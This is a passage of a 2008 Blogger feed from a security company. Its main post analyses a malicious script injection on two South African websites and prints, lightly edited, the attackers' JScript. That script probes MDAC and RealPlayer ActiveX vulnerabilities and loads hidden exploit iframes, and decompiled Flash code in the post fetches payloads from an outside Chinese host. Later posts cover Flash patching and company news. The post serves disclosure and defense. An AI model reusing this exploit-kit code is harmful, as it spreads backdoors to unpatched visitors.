class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                         &lt;/span&gt;{&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                        &lt;/span&gt;document.write('&lt;iframe src="new.htm" height="0" width="10"&gt;&lt;/iframe&gt;')}}}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                        &lt;/span&gt;document.write('&lt;iframe src="04.htm" height="0" width="50"&gt;&lt;/iframe&gt;')&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                &lt;/span&gt;if(j=="[object Error]")&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;                                &lt;/span&gt;{location.replace("about:blank");}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;&lt;span style=""&gt;                &lt;/span&gt;}}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;span style=""&gt;        &lt;/span&gt;}&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;openWM();&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;./script&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="MsoNormal"&gt;Bear in mind that posting this on the blog, we changed a couple of things in the src code, but in any event, you should get the idea.&lt;br /&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;So, this is quite impressive because if your personal configuration does not give any sort of errors with the creation of the Adobe.Stream object, you will be directed to 14.htm. &lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;From this point, the malicious binary and backdoor “bak.exe” will by downloaded to your computer via the MDAC vulnerability(if you are unpatched that is). &lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;If any sort of errors occur a Real Player “hax” will be checked for, and this includes several different versions and vulnerabilities. &lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p class="MsoNormal"&gt;Once again, if nothing is picked up and if any errors accour, you will be taken to rl.htm and your machine will be potentially backdoored. I must stress that if it fails, it will check for several different Real Player vulnerabilities, some of which are much more recent(Including heap spraying techniques). So, thanks to websites being vulnerable, the general public now have a big issue. Anyway...&lt;br /&gt;&lt;/p&gt;   &lt;p&gt;&lt;u&gt;Lets take a look at 123.htm:&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p&gt;&lt;.script&gt;window.onerror=function(){return true;}&lt;/p&gt;   &lt;p&gt;&lt;.Script Language="JScript"&gt;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;var cook = "silentwm";&lt;/p&gt;   &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;function setCookie(name, value, expire)&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;      &lt;/span&gt;&lt;span style=""&gt;  &lt;/span&gt;{&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;window.document.cookie = name + "=" + escape(value) + ((expire == null) ? "" : ("; expires=" + expire.toGMTString()));&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;}&lt;/p&gt;   &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;function getCookie(Name)&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;{&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;var search = Name + "=";&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;if (window.document.cookie.length &gt; 0)&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;{&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                        &lt;/span&gt;offset = window.document.cookie.indexOf(search);&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                        &lt;/span&gt;if (offset != -1)&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                        &lt;/span&gt;{&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                &lt;/span&gt;offset += search.length;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;       &lt;/span&gt;&lt;span style=""&gt;                   &lt;/span&gt;end = window.document.cookie.indexOf(";", offset)&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                          &lt;/span&gt;if (end == -1)&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                            &lt;/span&gt;end = window.document.cookie.length;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                          &lt;/span&gt;return unescape(window.document.cookie.substring(offset, end));&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                         &lt;/span&gt;}&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                 &lt;/span&gt;}&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;          &lt;/span&gt;return null;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;}&lt;/p&gt;   &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;function register(name)&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;{&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;var today = new Date();&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;var expires = new Date();&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;expires.setTime(today.getTime() + 1000*60*60*24);&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;setCookie(cook, name, expires);&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;}&lt;/p&gt;   &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;function openWM()&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;{&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;var c = getCookie(cook);&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;if (c != null)&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;{&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;return;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;}&lt;/p&gt;   &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;     &lt;/span&gt;&lt;span style=""&gt;           &lt;/span&gt;register(cook);&lt;/p&gt;   &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;window.defaultStatus="å®æ";&lt;/p&gt;   &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;try{ var e;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                        &lt;/span&gt;var ado=(document.createElement("object"));&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                        &lt;/span&gt;ado.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                        &lt;/span&gt;var as=ado.createobject("Adodb.Stream","")}&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;catch(e){};&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                &lt;/span&gt;finally{&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                        &lt;/span&gt;if(e!="[object Error]"){&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                &lt;/span&gt;document.write("&lt;iframe src="14.htm" height="0" width="50"&gt;&lt;/iframe&gt;")}&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                        &lt;/span&gt;else&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                        &lt;/span&gt;{&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                &lt;/span&gt;try{ var j;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                        &lt;/span&gt;var real11=new ActiveXObject("IERP"+"Ctl.I"+"ERPCtl.1");}&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                &lt;/span&gt;catch(j){};&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                &lt;/span&gt;finally{if(j!="[object Error]"){if(new ActiveXObject("IERPCtl.IERPCtl.1").PlayerProperty("PRODUCTVERSION")&lt;="6.0.14.552")&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                        &lt;/span&gt;{document.write('&lt;iframe src="rl.htm" height="0" width="10"&gt;&lt;/iframe&gt;')}&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                         &lt;/span&gt;else&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                         &lt;/span&gt;{&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                        &lt;/span&gt;document.write('&lt;iframe src="new.htm" height="0" width="10"&gt;&lt;/iframe&gt;')}}}&lt;/p&gt;   &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                        &lt;/span&gt;document.write('&lt;iframe src="04.htm" height="0" width="50"&gt;&lt;/iframe&gt;')&lt;/p&gt;   &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                &lt;/span&gt;if(j=="[object Error]")&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                                &lt;/span&gt;{location.replace("about:blank");}&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;                        &lt;/span&gt;}}&lt;/p&gt;   &lt;p&gt;&lt;span style=""&gt;        &lt;/span&gt;}&lt;/p&gt;   &lt;p&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/p&gt;   &lt;p&gt;openWM();&lt;/p&gt;   &lt;p&gt;&lt;./script&gt;&lt;/p&gt;&lt;p&gt;Once again, please bear in mind that the above has been edited for the blog post.&lt;br /&gt;&lt;/p&gt;   &lt;p&gt;There are actually 2 separate files that have the same content as per above, but both of them are hosting malicious swf files. In addition to this if you are using different browsers different files are loaded (i.e. 4561.swf and 4562.swf).&lt;br /&gt;&lt;/p&gt;   &lt;p&gt;Decompiling the flash objects brought Flash action scripts, which load other movies:&lt;/p&gt;   &lt;p&gt;&lt;u&gt;4561.swf&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p&gt;var fVersion = /:$version;&lt;br /&gt;loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);&lt;br /&gt;stop();  &lt;!--[if !supportLineBreakNewLine]--&gt;  &lt;!--[endif]--&gt;&lt;/p&gt;   &lt;p&gt;&lt;u&gt;4562.swf&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/p&gt;   &lt;p&gt;var fVersion = /:$version;&lt;br /&gt;loadMovie('hxxp://www.woai117.cn/' + fVersion + 'f.swf', _root);&lt;br /&gt;stop();&lt;/p&gt;   &lt;p&gt;These refer to instances of swf files which are dangerous and obviously refer to the Adobe Flash Player vulnerabilities. There are also other functions which load in the Trojan “bak.exe”which refer to RDS.Datacontrol (MS06-014) which we mentioned earlier.&lt;/p&gt;   &lt;p&gt;Please take into account the severity of this issue, and obviously the huge impact. The general end user who visits these websites are usually not up to date with versions of Realplayer, Flash and obviously Microsoft updates.&lt;br /&gt;&lt;/p&gt;&lt;p&gt;Take into account that this was also done in very little time, just to check the possible impact by visiting those two sites. If anyone wants a copy of the above files for any sort of analysis, please do let us know and we would be more than happy to send them across. &lt;/p&gt;   &lt;p&gt;All users that visited sabc.co.za or reportstar.net in the last little while should be aware that if they had/have vulnerable versions of Realplayer/Shockwave/Microsoft MS06-014 are probably infected and carrying a backdoor. In addition to this, all the stats are well logged for the guys to see exactly what’s going on in their little game.&lt;/p&gt;   &lt;p class="MsoNormal"&gt;&lt;span style="" lang="EN-ZA"&gt;&lt;o:p&gt; &lt;/o:p&gt;&lt;/span&gt;&lt;/p&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-2001621739671272887?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/2001621739671272887/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=2001621739671272887' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/2001621739671272887'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/2001621739671272887'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/06/silent-love-china-reference-to-sabccoza.html' title='Silent Love China - Reference to sabc.co.za and reportstar.net hax'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_4Wfys5NtIhA/SEWygr8q5YI/AAAAAAAAABY/f9byNhqbISI/s72-c/dota11_cn_m_js.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-7004393927232012884</id><published>2008-06-02T19:20:00.005+02:00</published><updated>2008-06-02T19:39:00.421+02:00</updated><title type='text'>Adobe Flash Attacks and more..</title><content type='html'>A security hole has recently been discovered in Macromedia Shockwave Flash allowing attackers to compromise machines that haven't applied the relevant patches. A large number of sites(even local co.za sites) have been compromised, and are still hosting the malicious content, this is affecting end users.&lt;br /&gt;&lt;br /&gt;Please download the patch or the updated package and install from here:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash"&gt;http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;It is critical that you apply this patch as soon as possible to avoid your machine being compromised.&lt;br /&gt;&lt;br /&gt;More about this can be read on:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527"&gt;http://www.shadowserver.org/wiki/pmwiki.php?n=Calendar.20080527&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;In other news, it seems like www.sabc.co.za and www.reportstar.net were hit by instances of injection(No links added for obvious reasons). This was confirmed by several clients emailing us about it. The websites should still be visible on Google for confirmation.&lt;br /&gt;&lt;br /&gt;The source code of www.sabc.co.za and www.reportstar.net both included:&lt;br /&gt;&lt;br /&gt;http://www.dota11.cn/m.js - as of morning of 2nd June 2008.&lt;br /&gt;&lt;br /&gt;You can read up more about it at:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3409559&amp;amp;SiteID=1"&gt;http://forums.microsoft.com/MSDN/ShowPost.aspx?PostID=3409559&amp;amp;SiteID=1&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-7004393927232012884?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/7004393927232012884/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=7004393927232012884' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7004393927232012884'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/7004393927232012884'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/06/adobe-flash-attacks-and-more.html' title='Adobe Flash Attacks and more..'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-2251902971978026295</id><published>2008-05-30T17:57:00.004+02:00</published><updated>2008-05-30T19:38:28.077+02:00</updated><title type='text'>Telspace charity success.</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_VRGFvOQtWJ4/SEAnO2WTtZI/AAAAAAAAAAU/N42DVG20mK4/s1600-h/roberto.png"&gt;&lt;img style="margin: 0pt 0pt 10px 10px; float: right; cursor: pointer;" src="http://1.bp.blogspot.com/_VRGFvOQtWJ4/SEAnO2WTtZI/AAAAAAAAAAU/N42DVG20mK4/s320/roberto.png" alt="" id="BLOGGER_PHOTO_ID_5206204305301026194" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;Firstly we would like to say thanks to everyone who wore our T-shirts at the ITweb Security summit this year, it all worked out really well thanks to all you guys. We sponsored R20 per Person that wore a T-shirts to Johnny Long's charity foundation www.hackersforcharity.org. We also decided that since the turnaround was so great, even though all 500 were not worn, we would still donate as if all 500 were, which is fantastic.&lt;br /&gt;&lt;br /&gt;Overall it was a great success with around 350 people wearing our shirts. The Security Summit 2008 too was amazing, and featured great talks by key-note speakers and good friends of ours Roberto Preatoni, Johnny Long and Johnny Cache.&lt;br /&gt;&lt;br /&gt;So once again thanks to everyone who helped out.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-2251902971978026295?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/2251902971978026295/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=2251902971978026295' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/2251902971978026295'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/2251902971978026295'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/05/telspace-charity-success.html' title='Telspace charity success.'/><author><name>Charlie</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_VRGFvOQtWJ4/SEAnO2WTtZI/AAAAAAAAAAU/N42DVG20mK4/s72-c/roberto.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2540168616552398462.post-1544614561819085389</id><published>2008-05-30T16:32:00.007+02:00</published><updated>2008-05-30T16:44:31.910+02:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Celebrations'/><title type='text'>Celebrations - Good times...</title><content type='html'>Friday afternoons are always good at Telspace Systems, but specifically today! We have just received some extremely good news that caused for a bit of a celebration on our side.&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: left;"&gt;Thank you to all our clients for their continuous support over the previous year, we really appreciate it and we have been working extremely hard to provide services which are unique in our market. I would like to thank our entire team for working so hard to get this point.&lt;/div&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_4Wfys5NtIhA/SEASKL8q5VI/AAAAAAAAABA/sbgJAqJtRM8/s1600-h/DSC00508.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_4Wfys5NtIhA/SEASKL8q5VI/AAAAAAAAABA/sbgJAqJtRM8/s320/DSC00508.JPG" alt="" id="BLOGGER_PHOTO_ID_5206181135455544658" border="0" /&gt;&lt;/a&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_4Wfys5NtIhA/SEAR478q5UI/AAAAAAAAAA4/Xgc4MUTo9DI/s1600-h/DSC00507.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://4.bp.blogspot.com/_4Wfys5NtIhA/SEAR478q5UI/AAAAAAAAAA4/Xgc4MUTo9DI/s320/DSC00507.JPG" alt="" id="BLOGGER_PHOTO_ID_5206180839102801218" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://3.bp.blogspot.com/_4Wfys5NtIhA/SEASTr8q5WI/AAAAAAAAABI/dQ7_RQpPZJw/s1600-h/DSC00505.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://3.bp.blogspot.com/_4Wfys5NtIhA/SEASTr8q5WI/AAAAAAAAABI/dQ7_RQpPZJw/s320/DSC00505.JPG" alt="" id="BLOGGER_PHOTO_ID_5206181298664301922" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_4Wfys5NtIhA/SEARpL8q5TI/AAAAAAAAAAw/6NqFC5pQHK4/s1600-h/DSC00506.JPG"&gt;&lt;img style="margin: 0pt 10px 10px 0pt; float: left; cursor: pointer;" src="http://1.bp.blogspot.com/_4Wfys5NtIhA/SEARpL8q5TI/AAAAAAAAAAw/6NqFC5pQHK4/s320/DSC00506.JPG" alt="" id="BLOGGER_PHOTO_ID_5206180568519861554" border="0" /&gt;&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2540168616552398462-1544614561819085389?l=0mghax.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://0mghax.blogspot.com/feeds/1544614561819085389/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2540168616552398462&amp;postID=1544614561819085389' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1544614561819085389'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2540168616552398462/posts/default/1544614561819085389'/><link rel='alternate' type='text/html' href='http://0mghax.blogspot.com/2008/05/celebrations-good-times.html' title='Celebrations - Good times...'/><author><name>Dino C</name><uri>http://www.blogger.com/profile/11667765130278783411</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://1.bp.blogspot.com/_4Wfys5NtIhA/SEASKL8q5VI/AAAAAAAAABA/sbgJAqJtRM8/s72-c/DSC00508.JPG' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
